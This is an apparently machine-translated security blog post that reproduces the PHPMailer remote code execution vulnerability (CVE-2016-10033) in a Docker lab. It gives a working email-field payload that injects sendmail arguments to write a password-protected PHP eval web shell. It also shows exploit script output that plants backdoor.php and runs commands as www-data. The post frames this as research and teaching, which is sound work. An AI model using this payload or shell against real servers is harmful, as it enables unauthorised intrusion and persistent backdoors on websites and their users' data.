PHPMailer remote command execution vulnerability reappears
I. Introduction of vulnerabilities
PHPMailer is a PHP email creation and delivery class for multiple open source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! And so on.
PHPMailer < 5.2.18 has a security vulnerability that allows an unauthenticated remote attacker to execute arbitrary code in the context of a Web server user to remotely control a target Web application.
Ii. Impact Version:
PHPMailer < 5.2.18
Third, vulnerability recurrence
Docker environment:
docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033
Copy the code
Pull image boot environment:
http://192.168.1.107:8080/
http://192.168.1.107:8080/, simply type in the name place such as "aaa", in the email input: -queuedirectory =/ TMP /. -x /var/www/ HTML/[email protected] <? PHP @eval($_POST['thelostworld']) ? >Copy the code
Upload a word Trojan, the page will respond 3-5 minutes, the response time is long
Trojan address: http://192.168.1.107:8080/a.php password: thelostworld
Virtual terminal:
Using scripts:
Obtaining scripts The background replies to PHPMailer to obtain scripts
➜ Desktop./ exploitor. sh 192.168.1.107:8080 [+] CVE-2016-10033 Exploits by Opsxcq [+] Exploiting 192.168.1.107:8080 [+] Target exploited, Acessing shell at http://192.168.1.107:8080/backdoor.php [+] Checking if the backdoor was created on the target system [+] Backdoor.php found on remote system [+] Running whoami www-data RemoteShell> [+] Running RemoteShell> id [+] Running id uid=33(www-data) gid=33(www-data) groups=33(www-data)Copy the code
Access Trojan address:
http://192.168.1.107:8080/backdoor.php
Reference:
www.cnblogs.com/Hi-blog/p/7…
www.exploit-db.com/exploits/40…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq\_3760279…
Personal blog garden: www.cnblogs.com/thelostworl…
FREEBUF homepage: www.freebuf.com/author/thel…